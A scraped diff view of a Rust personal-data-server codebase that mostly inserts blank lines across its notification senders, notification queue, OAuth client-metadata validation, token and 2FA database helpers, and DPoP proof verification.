2
mod service;
3
3
mod types;
4
+
4
5
pub use sender::{
5
6
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
6
7
is_valid_phone_number, sanitize_header_value,
7
8
};
9
+
8
10
pub use service::{
9
11
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
10
12
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
11
13
enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService,
12
14
};
15
+
13
16
pub use types::{
14
17
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
15
18
};
+30
src/notifications/sender.rs
+30
src/notifications/sender.rs
···
5
5
use std::time::Duration;
6
6
use tokio::io::AsyncWriteExt;
7
7
use tokio::process::Command;
8
+
8
9
use super::types::{NotificationChannel, QueuedNotification};
10
+
9
11
const HTTP_TIMEOUT_SECS: u64 = 30;
10
12
const MAX_RETRIES: u32 = 3;
11
13
const INITIAL_RETRY_DELAY_MS: u64 = 500;
14
+
12
15
#[async_trait]
13
16
pub trait NotificationSender: Send + Sync {
14
17
fn channel(&self) -> NotificationChannel;
15
18
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>;
16
19
}
20
+
17
21
#[derive(Debug, thiserror::Error)]
18
22
pub enum SendError {
19
23
#[error("Failed to spawn sendmail process: {0}")]
···
31
35
#[error("Max retries exceeded: {0}")]
32
36
MaxRetriesExceeded(String),
33
37
}
38
+
34
39
fn create_http_client() -> Client {
35
40
Client::builder()
36
41
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
···
38
43
.build()
39
44
.unwrap_or_else(|_| Client::new())
40
45
}
46
+
41
47
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
42
48
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
43
49
}
50
+
44
51
async fn retry_delay(attempt: u32) {
45
52
let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
46
53
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
47
54
}
55
+
48
56
pub fn sanitize_header_value(value: &str) -> String {
49
57
value.replace(['\r', '\n'], " ").trim().to_string()
50
58
}
59
+
51
60
pub fn is_valid_phone_number(number: &str) -> bool {
52
61
if number.len() < 2 || number.len() > 20 {
53
62
return false;
···
59
68
let remaining: String = chars.collect();
60
69
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
61
70
}
71
+
62
72
pub struct EmailSender {
63
73
from_address: String,
64
74
from_name: String,
65
75
sendmail_path: String,
66
76
}
77
+
67
78
impl EmailSender {
68
79
pub fn new(from_address: String, from_name: String) -> Self {
69
80
Self {
···
72
83
sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()),
73
84
}
74
85
}
86
+
75
87
pub fn from_env() -> Option<Self> {
76
88
let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?;
77
89
let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string());
78
90
Some(Self::new(from_address, from_name))
79
91
}
92
+
80
93
pub fn format_email(&self, notification: &QueuedNotification) -> String {
81
94
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
82
95
let recipient = sanitize_header_value(¬ification.recipient);
···
94
107
)
95
108
}
96
109
}
110
+
97
111
#[async_trait]
98
112
impl NotificationSender for EmailSender {
99
113
fn channel(&self) -> NotificationChannel {
100
114
NotificationChannel::Email
101
115
}
116
+
102
117
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
103
118
let email_content = self.format_email(notification);
104
119
let mut child = Command::new(&self.sendmail_path)
···
119
134
Ok(())
120
135
}
121
136
}
137
+
122
138
pub struct DiscordSender {
123
139
webhook_url: String,
124
140
http_client: Client,
125
141
}
142
+
126
143
impl DiscordSender {
127
144
pub fn new(webhook_url: String) -> Self {
128
145
Self {
···
130
147
http_client: create_http_client(),
131
148
}
132
149
}
150
+
133
151
pub fn from_env() -> Option<Self> {
134
152
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
135
153
Some(Self::new(webhook_url))
136
154
}
137
155
}
156
+
138
157
#[async_trait]
139
158
impl NotificationSender for DiscordSender {
140
159
fn channel(&self) -> NotificationChannel {
141
160
NotificationChannel::Discord
142
161
}
162
+
143
163
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
144
164
let subject = notification.subject.as_deref().unwrap_or("Notification");
145
165
let content = format!("**{}**\n\n{}", subject, notification.body);
···
193
213
))
194
214
}
195
215
}
216
+
196
217
pub struct TelegramSender {
197
218
bot_token: String,
198
219
http_client: Client,
199
220
}
221
+
200
222
impl TelegramSender {
201
223
pub fn new(bot_token: String) -> Self {
202
224
Self {
···
204
226
http_client: create_http_client(),
205
227
}
206
228
}
229
+
207
230
pub fn from_env() -> Option<Self> {
208
231
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
209
232
Some(Self::new(bot_token))
210
233
}
211
234
}
235
+
212
236
#[async_trait]
213
237
impl NotificationSender for TelegramSender {
214
238
fn channel(&self) -> NotificationChannel {
215
239
NotificationChannel::Telegram
216
240
}
241
+
217
242
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
218
243
let chat_id = ¬ification.recipient;
219
244
let subject = notification.subject.as_deref().unwrap_or("Notification");
···
273
298
))
274
299
}
275
300
}
301
+
276
302
pub struct SignalSender {
277
303
signal_cli_path: String,
278
304
sender_number: String,
279
305
}
306
+
280
307
impl SignalSender {
281
308
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
282
309
Self {
···
284
311
sender_number,
285
312
}
286
313
}
314
+
287
315
pub fn from_env() -> Option<Self> {
288
316
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
289
317
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
···
291
319
Some(Self::new(signal_cli_path, sender_number))
292
320
}
293
321
}
322
+
294
323
#[async_trait]
295
324
impl NotificationSender for SignalSender {
296
325
fn channel(&self) -> NotificationChannel {
297
326
NotificationChannel::Signal
298
327
}
328
+
299
329
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
300
330
let recipient = ¬ification.recipient;
301
331
if !is_valid_phone_number(recipient) {
+27
src/notifications/service.rs
+27
src/notifications/service.rs
···
1
1
use std::collections::HashMap;
2
2
use std::sync::Arc;
3
3
use std::time::Duration;
4
+
4
5
use chrono::Utc;
5
6
use sqlx::PgPool;
6
7
use tokio::sync::watch;
7
8
use tokio::time::interval;
8
9
use tracing::{debug, error, info, warn};
9
10
use uuid::Uuid;
11
+
10
12
use super::sender::{NotificationSender, SendError};
11
13
use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification};
14
+
12
15
pub struct NotificationService {
13
16
db: PgPool,
14
17
senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>,
15
18
poll_interval: Duration,
16
19
batch_size: i64,
17
20
}
21
+
18
22
impl NotificationService {
19
23
pub fn new(db: PgPool) -> Self {
20
24
let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS")
···
32
36
batch_size,
33
37
}
34
38
}
39
+
35
40
pub fn with_poll_interval(mut self, interval: Duration) -> Self {
36
41
self.poll_interval = interval;
37
42
self
38
43
}
44
+
39
45
pub fn with_batch_size(mut self, size: i64) -> Self {
40
46
self.batch_size = size;
41
47
self
42
48
}
49
+
43
50
pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self {
44
51
self.senders.insert(sender.channel(), Arc::new(sender));
45
52
self
46
53
}
54
+
47
55
pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
48
56
let id = sqlx::query_scalar!(
49
57
r#"
···
65
73
debug!(notification_id = %id, "Notification enqueued");
66
74
Ok(id)
67
75
}
76
+
68
77
pub fn has_senders(&self) -> bool {
69
78
!self.senders.is_empty()
70
79
}
80
+
71
81
pub async fn run(self, mut shutdown: watch::Receiver<bool>) {
72
82
if self.senders.is_empty() {
73
83
warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured.");
···
95
105
}
96
106
}
97
107
}
108
+
98
109
async fn process_batch(&self) -> Result<(), sqlx::Error> {
99
110
let notifications = self.fetch_pending_notifications().await?;
100
111
if notifications.is_empty() {
···
106
117
}
107
118
Ok(())
108
119
}
120
+
109
121
async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> {
110
122
let now = Utc::now();
111
123
sqlx::query_as!(
···
137
149
.fetch_all(&self.db)
138
150
.await
139
151
}
152
+
140
153
async fn process_notification(&self, notification: QueuedNotification) {
141
154
let notification_id = notification.id;
142
155
let channel = notification.channel;
···
179
192
}
180
193
}
181
194
}
195
+
182
196
async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> {
183
197
sqlx::query!(
184
198
r#"
···
192
206
.await?;
193
207
Ok(())
194
208
}
209
+
195
210
async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> {
196
211
sqlx::query!(
197
212
r#"
···
215
230
Ok(())
216
231
}
217
232
}
233
+
218
234
pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
219
235
sqlx::query_scalar!(
220
236
r#"
···
234
250
.fetch_one(db)
235
251
.await
236
252
}
253
+
237
254
pub struct UserNotificationPrefs {
238
255
pub channel: NotificationChannel,
239
256
pub email: Option<String>,
240
257
pub handle: String,
241
258
}
259
+
242
260
pub async fn get_user_notification_prefs(
243
261
db: &PgPool,
244
262
user_id: Uuid,
···
262
280
handle: row.handle,
263
281
})
264
282
}
283
+
265
284
pub async fn enqueue_welcome(
266
285
db: &PgPool,
267
286
user_id: Uuid,
···
285
304
)
286
305
.await
287
306
}
307
+
288
308
pub async fn enqueue_email_verification(
289
309
db: &PgPool,
290
310
user_id: Uuid,
···
309
329
)
310
330
.await
311
331
}
332
+
312
333
pub async fn enqueue_password_reset(
313
334
db: &PgPool,
314
335
user_id: Uuid,
···
333
354
)
334
355
.await
335
356
}
357
+
336
358
pub async fn enqueue_email_update(
337
359
db: &PgPool,
338
360
user_id: Uuid,
···
357
379
)
358
380
.await
359
381
}
382
+
360
383
pub async fn enqueue_account_deletion(
361
384
db: &PgPool,
362
385
user_id: Uuid,
···
381
404
)
382
405
.await
383
406
}
407
+
384
408
pub async fn enqueue_plc_operation(
385
409
db: &PgPool,
386
410
user_id: Uuid,
···
405
429
)
406
430
.await
407
431
}
432
+
408
433
pub async fn enqueue_2fa_code(
409
434
db: &PgPool,
410
435
user_id: Uuid,
···
429
454
)
430
455
.await
431
456
}
457
+
432
458
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
433
459
match channel {
434
460
NotificationChannel::Email => "email",
···
437
463
NotificationChannel::Signal => "Signal",
438
464
}
439
465
}
466
+
440
467
pub async fn enqueue_signup_verification(
441
468
db: &PgPool,
442
469
user_id: Uuid,
+7
src/notifications/types.rs
+7
src/notifications/types.rs
···
2
2
use serde::{Deserialize, Serialize};
3
3
use sqlx::FromRow;
4
4
use uuid::Uuid;
5
+
5
6
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)]
6
7
#[sqlx(type_name = "notification_channel", rename_all = "lowercase")]
7
8
pub enum NotificationChannel {
···
10
11
Telegram,
11
12
Signal,
12
13
}
14
+
13
15
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
14
16
#[sqlx(type_name = "notification_status", rename_all = "lowercase")]
15
17
pub enum NotificationStatus {
···
18
20
Sent,
19
21
Failed,
20
22
}
23
+
21
24
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
22
25
#[sqlx(type_name = "notification_type", rename_all = "snake_case")]
23
26
pub enum NotificationType {
···
30
33
PlcOperation,
31
34
TwoFactorCode,
32
35
}
36
+
33
37
#[derive(Debug, Clone, FromRow)]
34
38
pub struct QueuedNotification {
35
39
pub id: Uuid,
···
49
53
pub scheduled_for: DateTime<Utc>,
50
54
pub processed_at: Option<DateTime<Utc>>,
51
55
}
56
+
52
57
pub struct NewNotification {
53
58
pub user_id: Uuid,
54
59
pub channel: NotificationChannel,
···
58
63
pub body: String,
59
64
pub metadata: Option<serde_json::Value>,
60
65
}
66
+
61
67
impl NewNotification {
62
68
pub fn new(
63
69
user_id: Uuid,
···
77
83
metadata: None,
78
84
}
79
85
}
86
+
80
87
pub fn email(
81
88
user_id: Uuid,
82
89
notification_type: NotificationType,
+22
src/oauth/client.rs
+22
src/oauth/client.rs
···
3
3
use std::collections::HashMap;
4
4
use std::sync::Arc;
5
5
use tokio::sync::RwLock;
6
+
6
7
use super::OAuthError;
8
+
7
9
#[derive(Debug, Clone, Serialize, Deserialize)]
8
10
pub struct ClientMetadata {
9
11
pub client_id: String,
···
31
33
#[serde(skip_serializing_if = "Option::is_none")]
32
34
pub application_type: Option<String>,
33
35
}
36
+
34
37
impl Default for ClientMetadata {
35
38
fn default() -> Self {
36
39
Self {
···
50
53
}
51
54
}
52
55
}
56
+
53
57
#[derive(Clone)]
54
58
pub struct ClientMetadataCache {
55
59
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
···
57
61
http_client: Client,
58
62
cache_ttl_secs: u64,
59
63
}
64
+
60
65
struct CachedMetadata {
61
66
metadata: ClientMetadata,
62
67
cached_at: std::time::Instant,
63
68
}
69
+
64
70
struct CachedJwks {
65
71
jwks: serde_json::Value,
66
72
cached_at: std::time::Instant,
67
73
}
74
+
68
75
impl ClientMetadataCache {
69
76
pub fn new(cache_ttl_secs: u64) -> Self {
70
77
Self {
···
78
85
cache_ttl_secs,
79
86
}
80
87
}
88
+
81
89
pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
82
90
{
83
91
let cache = self.cache.read().await;
···
100
108
}
101
109
Ok(metadata)
102
110
}
111
+
103
112
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
104
113
if let Some(jwks) = &metadata.jwks {
105
114
return Ok(jwks.clone());
···
130
139
}
131
140
Ok(jwks)
132
141
}
142
+
133
143
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
134
144
if !jwks_uri.starts_with("https://") {
135
145
if !jwks_uri.starts_with("http://")
···
166
176
}
167
177
Ok(jwks)
168
178
}
179
+
169
180
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
170
181
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
171
182
return Err(OAuthError::InvalidClient(
···
207
218
self.validate_metadata(&metadata)?;
208
219
Ok(metadata)
209
220
}
221
+
210
222
fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> {
211
223
if metadata.redirect_uris.is_empty() {
212
224
return Err(OAuthError::InvalidClient(
···
232
244
}
233
245
Ok(())
234
246
}
247
+
235
248
pub fn validate_redirect_uri(
236
249
&self,
237
250
metadata: &ClientMetadata,
···
244
257
}
245
258
Ok(())
246
259
}
260
+
247
261
fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> {
248
262
if uri.contains('#') {
249
263
return Err(OAuthError::InvalidClient(
···
278
292
Ok(())
279
293
}
280
294
}
295
+
281
296
impl ClientMetadata {
282
297
pub fn requires_dpop(&self) -> bool {
283
298
self.dpop_bound_access_tokens.unwrap_or(false)
284
299
}
300
+
285
301
pub fn auth_method(&self) -> &str {
286
302
self.token_endpoint_auth_method
287
303
.as_deref()
288
304
.unwrap_or("none")
289
305
}
290
306
}
307
+
291
308
pub async fn verify_client_auth(
292
309
cache: &ClientMetadataCache,
293
310
metadata: &ClientMetadata,
···
321
338
))),
322
339
}
323
340
}
341
+
324
342
async fn verify_private_key_jwt_async(
325
343
cache: &ClientMetadataCache,
326
344
metadata: &ClientMetadata,
···
425
443
"client_assertion signature verification failed".to_string(),
426
444
))
427
445
}
446
+
428
447
fn verify_es256(
429
448
key: &serde_json::Value,
430
449
signing_input: &str,
···
456
475
.verify(signing_input.as_bytes(), &sig)
457
476
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
458
477
}
478
+
459
479
fn verify_es384(
460
480
key: &serde_json::Value,
461
481
signing_input: &str,
···
487
507
.verify(signing_input.as_bytes(), &sig)
488
508
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
489
509
}
510
+
490
511
fn verify_rsa(
491
512
_alg: &str,
492
513
_key: &serde_json::Value,
···
497
518
"RSA signature verification not yet supported - use EC keys".to_string(),
498
519
))
499
520
}
521
+
500
522
fn verify_eddsa(
501
523
key: &serde_json::Value,
502
524
signing_input: &str,
+2
src/oauth/db/client.rs
+2
src/oauth/db/client.rs
···
1
1
use sqlx::PgPool;
2
2
use super::super::{AuthorizedClientData, OAuthError};
3
3
use super::helpers::{from_json, to_json};
4
+
4
5
pub async fn upsert_authorized_client(
5
6
pool: &PgPool,
6
7
did: &str,
···
22
23
.await?;
23
24
Ok(())
24
25
}
26
+
25
27
pub async fn get_authorized_client(
26
28
pool: &PgPool,
27
29
did: &str,
+8
src/oauth/db/device.rs
+8
src/oauth/db/device.rs
···
1
1
use chrono::{DateTime, Utc};
2
2
use sqlx::PgPool;
3
3
use super::super::{DeviceData, OAuthError};
4
+
4
5
pub struct DeviceAccountRow {
5
6
pub did: String,
6
7
pub handle: String,
7
8
pub email: Option<String>,
8
9
pub last_used_at: DateTime<Utc>,
9
10
}
11
+
10
12
pub async fn create_device(
11
13
pool: &PgPool,
12
14
device_id: &str,
···
27
29
.await?;
28
30
Ok(())
29
31
}
32
+
30
33
pub async fn get_device(pool: &PgPool, device_id: &str) -> Result<Option<DeviceData>, OAuthError> {
31
34
let row = sqlx::query!(
32
35
r#"
···
45
48
last_seen_at: r.last_seen_at,
46
49
}))
47
50
}
51
+
48
52
pub async fn update_device_last_seen(
49
53
pool: &PgPool,
50
54
device_id: &str,
···
61
65
.await?;
62
66
Ok(())
63
67
}
68
+
64
69
pub async fn delete_device(pool: &PgPool, device_id: &str) -> Result<(), OAuthError> {
65
70
sqlx::query!(
66
71
r#"
···
72
77
.await?;
73
78
Ok(())
74
79
}
80
+
75
81
pub async fn upsert_account_device(
76
82
pool: &PgPool,
77
83
did: &str,
···
90
96
.await?;
91
97
Ok(())
92
98
}
99
+
93
100
pub async fn get_device_accounts(
94
101
pool: &PgPool,
95
102
device_id: &str,
···
118
125
})
119
126
.collect())
120
127
}
128
+
121
129
pub async fn verify_account_on_device(
122
130
pool: &PgPool,
123
131
device_id: &str,
+2
src/oauth/db/dpop.rs
+2
src/oauth/db/dpop.rs
···
1
1
use sqlx::PgPool;
2
2
use super::super::OAuthError;
3
+
3
4
pub async fn check_and_record_dpop_jti(
4
5
pool: &PgPool,
5
6
jti: &str,
···
16
17
.await?;
17
18
Ok(result.rows_affected() > 0)
18
19
}
20
+
19
21
pub async fn cleanup_expired_dpop_jtis(
20
22
pool: &PgPool,
21
23
max_age_secs: i64,
+2
src/oauth/db/helpers.rs
+2
src/oauth/db/helpers.rs
···
1
1
use serde::{de::DeserializeOwned, Serialize};
2
2
use super::super::OAuthError;
3
+
3
4
pub fn to_json<T: Serialize>(value: &T) -> Result<serde_json::Value, OAuthError> {
4
5
serde_json::to_value(value).map_err(|e| {
5
6
tracing::error!("JSON serialization error: {}", e);
6
7
OAuthError::ServerError("Internal serialization error".to_string())
7
8
})
8
9
}
10
+
9
11
pub fn from_json<T: DeserializeOwned>(value: serde_json::Value) -> Result<T, OAuthError> {
10
12
serde_json::from_value(value).map_err(|e| {
11
13
tracing::error!("JSON deserialization error: {}", e);
+1
src/oauth/db/mod.rs
+1
src/oauth/db/mod.rs
+6
src/oauth/db/request.rs
+6
src/oauth/db/request.rs
···
1
1
use sqlx::PgPool;
2
2
use super::super::{AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData};
3
3
use super::helpers::{from_json, to_json};
4
+
4
5
pub async fn create_authorization_request(
5
6
pool: &PgPool,
6
7
request_id: &str,
···
30
31
.await?;
31
32
Ok(())
32
33
}
34
+
33
35
pub async fn get_authorization_request(
34
36
pool: &PgPool,
35
37
request_id: &str,
···
64
66
None => Ok(None),
65
67
}
66
68
}
69
+
67
70
pub async fn update_authorization_request(
68
71
pool: &PgPool,
69
72
request_id: &str,
···
86
89
.await?;
87
90
Ok(())
88
91
}
92
+
89
93
pub async fn consume_authorization_request_by_code(
90
94
pool: &PgPool,
91
95
code: &str,
···
120
124
None => Ok(None),
121
125
}
122
126
}
127
+
123
128
pub async fn delete_authorization_request(
124
129
pool: &PgPool,
125
130
request_id: &str,
···
134
139
.await?;
135
140
Ok(())
136
141
}
142
+
137
143
pub async fn delete_expired_authorization_requests(pool: &PgPool) -> Result<u64, OAuthError> {
138
144
let result = sqlx::query!(
139
145
r#"
+12
src/oauth/db/token.rs
+12
src/oauth/db/token.rs
···
2
2
use sqlx::PgPool;
3
3
use super::super::{OAuthError, TokenData};
4
4
use super::helpers::{from_json, to_json};
5
+
5
6
pub async fn create_token(
6
7
pool: &PgPool,
7
8
data: &TokenData,
···
34
35
.await?;
35
36
Ok(row.id)
36
37
}
38
+
37
39
pub async fn get_token_by_id(
38
40
pool: &PgPool,
39
41
token_id: &str,
···
68
70
None => Ok(None),
69
71
}
70
72
}
73
+
71
74
pub async fn get_token_by_refresh_token(
72
75
pool: &PgPool,
73
76
refresh_token: &str,
···
105
108
None => Ok(None),
106
109
}
107
110
}
111
+
108
112
pub async fn rotate_token(
109
113
pool: &PgPool,
110
114
old_db_id: i32,
···
149
153
tx.commit().await?;
150
154
Ok(())
151
155
}
156
+
152
157
pub async fn check_refresh_token_used(
153
158
pool: &PgPool,
154
159
refresh_token: &str,
···
163
168
.await?;
164
169
Ok(row)
165
170
}
171
+
166
172
pub async fn delete_token(pool: &PgPool, token_id: &str) -> Result<(), OAuthError> {
167
173
sqlx::query!(
168
174
r#"
···
174
180
.await?;
175
181
Ok(())
176
182
}
183
+
177
184
pub async fn delete_token_family(pool: &PgPool, db_id: i32) -> Result<(), OAuthError> {
178
185
sqlx::query!(
179
186
r#"
···
185
192
.await?;
186
193
Ok(())
187
194
}
195
+
188
196
pub async fn list_tokens_for_user(
189
197
pool: &PgPool,
190
198
did: &str,
···
220
228
}
221
229
Ok(tokens)
222
230
}
231
+
223
232
pub async fn count_tokens_for_user(pool: &PgPool, did: &str) -> Result<i64, OAuthError> {
224
233
let count = sqlx::query_scalar!(
225
234
r#"
···
231
240
.await?;
232
241
Ok(count)
233
242
}
243
+
234
244
pub async fn delete_oldest_tokens_for_user(
235
245
pool: &PgPool,
236
246
did: &str,
···
253
263
.await?;
254
264
Ok(result.rows_affected())
255
265
}
266
+
256
267
const MAX_TOKENS_PER_USER: i64 = 100;
268
+
257
269
pub async fn enforce_token_limit_for_user(pool: &PgPool, did: &str) -> Result<(), OAuthError> {
258
270
let count = count_tokens_for_user(pool, did).await?;
259
271
if count > MAX_TOKENS_PER_USER {
+9
src/oauth/db/two_factor.rs
+9
src/oauth/db/two_factor.rs
···
3
3
use sqlx::PgPool;
4
4
use uuid::Uuid;
5
5
use super::super::OAuthError;
6
+
6
7
pub struct TwoFactorChallenge {
7
8
pub id: Uuid,
8
9
pub did: String,
···
12
13
pub created_at: DateTime<Utc>,
13
14
pub expires_at: DateTime<Utc>,
14
15
}
16
+
15
17
pub fn generate_2fa_code() -> String {
16
18
let mut rng = rand::thread_rng();
17
19
let code: u32 = rng.gen_range(0..1_000_000);
18
20
format!("{:06}", code)
19
21
}
22
+
20
23
pub async fn create_2fa_challenge(
21
24
pool: &PgPool,
22
25
did: &str,
···
47
50
expires_at: row.expires_at,
48
51
})
49
52
}
53
+
50
54
pub async fn get_2fa_challenge(
51
55
pool: &PgPool,
52
56
request_uri: &str,
···
71
75
expires_at: r.expires_at,
72
76
}))
73
77
}
78
+
74
79
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
75
80
let row = sqlx::query!(
76
81
r#"
···
85
90
.await?;
86
91
Ok(row.attempts)
87
92
}
93
+
88
94
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
89
95
sqlx::query!(
90
96
r#"
···
96
102
.await?;
97
103
Ok(())
98
104
}
105
+
99
106
pub async fn delete_2fa_challenge_by_request_uri(
100
107
pool: &PgPool,
101
108
request_uri: &str,
···
110
117
.await?;
111
118
Ok(())
112
119
}
120
+
113
121
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
114
122
let result = sqlx::query!(
115
123
r#"
···
120
128
.await?;
121
129
Ok(result.rows_affected())
122
130
}
131
+
123
132
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
124
133
let row = sqlx::query!(
125
134
r#"
+20
src/oauth/dpop.rs
+20
src/oauth/dpop.rs
···
3
3
use chrono::Utc;
4
4
use serde::{Deserialize, Serialize};
5
5
use sha2::{Digest, Sha256};
6
+
6
7
use super::OAuthError;
8
+
7
9
const DPOP_NONCE_VALIDITY_SECS: i64 = 300;
8
10
const DPOP_MAX_AGE_SECS: i64 = 300;
11
+
9
12
#[derive(Debug, Clone)]
10
13
pub struct DPoPVerifyResult {
11
14
pub jkt: String,
12
15
pub jti: String,
13
16
}
17
+
14
18
#[derive(Debug, Clone, Serialize, Deserialize)]
15
19
pub struct DPoPProofHeader {
16
20
pub typ: String,
17
21
pub alg: String,
18
22
pub jwk: DPoPJwk,
19
23
}
24
+
20
25
#[derive(Debug, Clone, Serialize, Deserialize)]
21
26
pub struct DPoPJwk {
22
27
pub kty: String,
···
27
32
#[serde(skip_serializing_if = "Option::is_none")]
28
33
pub y: Option<String>,
29
34
}
35
+
30
36
#[derive(Debug, Clone, Serialize, Deserialize)]
31
37
pub struct DPoPProofPayload {
32
38
pub jti: String,
···
38
44
#[serde(skip_serializing_if = "Option::is_none")]
39
45
pub nonce: Option<String>,
40
46
}
47
+
41
48
pub struct DPoPVerifier {
42
49
secret: Vec<u8>,
43
50
}
51
+
44
52
impl DPoPVerifier {
45
53
pub fn new(secret: &[u8]) -> Self {
46
54
Self {
47
55
secret: secret.to_vec(),
48
56
}
49
57
}
58
+
50
59
pub fn generate_nonce(&self) -> String {
51
60
let timestamp = Utc::now().timestamp();
52
61
let timestamp_bytes = timestamp.to_be_bytes();
···
59
68
nonce_data.extend_from_slice(&hash[..16]);
60
69
URL_SAFE_NO_PAD.encode(&nonce_data)
61
70
}
71
+
62
72
pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> {
63
73
let nonce_bytes = URL_SAFE_NO_PAD
64
74
.decode(nonce)
···
83
93
}
84
94
Ok(())
85
95
}
96
+
86
97
pub fn verify_proof(
87
98
&self,
88
99
dpop_header: &str,
···
152
163
})
153
164
}
154
165
}
166
+
155
167
fn verify_dpop_signature(
156
168
alg: &str,
157
169
jwk: &DPoPJwk,
···
168
180
))),
169
181
}
170
182
}
183
+
171
184
fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
172
185
use p256::ecdsa::signature::Verifier;
173
186
use p256::ecdsa::{Signature, VerifyingKey};
···
208
221
.verify(message, &sig)
209
222
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
210
223
}
224
+
211
225
fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
212
226
use p384::ecdsa::signature::Verifier;
213
227
use p384::ecdsa::{Signature, VerifyingKey};
···
248
262
.verify(message, &sig)
249
263
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
250
264
}
265
+
251
266
fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
252
267
use ed25519_dalek::{Signature, VerifyingKey};
253
268
let crv = jwk.crv.as_ref().ok_or_else(|| {
···
277
292
.verify_strict(message, &sig)
278
293
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
279
294
}
295
+
280
296
pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> {
281
297
let canonical = match jwk.kty.as_str() {
282
298
"EC" => {
···
319
335
let hash = hasher.finalize();
320
336
Ok(URL_SAFE_NO_PAD.encode(&hash))
321
337
}
338
+
322
339
pub fn compute_access_token_hash(access_token: &str) -> String {
323
340
let mut hasher = Sha256::new();
324
341
hasher.update(access_token.as_bytes());
325
342
let hash = hasher.finalize();
326
343
URL_SAFE_NO_PAD.encode(&hash)
327
344
}
345
+
328
346
#[cfg(test)]
329
347
mod tests {
330
348
use super::*;
349
+
331
350
#[test]
332
351
fn test_nonce_generation_and_validation() {
333
352
let secret = b"test-secret-key-32-bytes-long!!!";
···
335
354
let nonce = verifier.generate_nonce();
336
355
assert!(verifier.validate_nonce(&nonce).is_ok());
337
356
}
357
+
338
358
#[test]
339
359
fn test_jwk_thumbprint_ec() {
340
360
let jwk = DPoPJwk {
+5
src/oauth/endpoints/metadata.rs
+5
src/oauth/endpoints/metadata.rs
···
2
2
use serde::{Deserialize, Serialize};
3
3
use crate::state::AppState;
4
4
use crate::oauth::jwks::{JwkSet, create_jwk_set};
5
+
5
6
#[derive(Debug, Serialize, Deserialize)]
6
7
pub struct ProtectedResourceMetadata {
7
8
pub resource: String,
···
11
12
#[serde(skip_serializing_if = "Option::is_none")]
12
13
pub resource_documentation: Option<String>,
13
14
}
15
+
14
16
#[derive(Debug, Serialize, Deserialize)]
15
17
pub struct AuthorizationServerMetadata {
16
18
pub issuer: String,
···
43
45
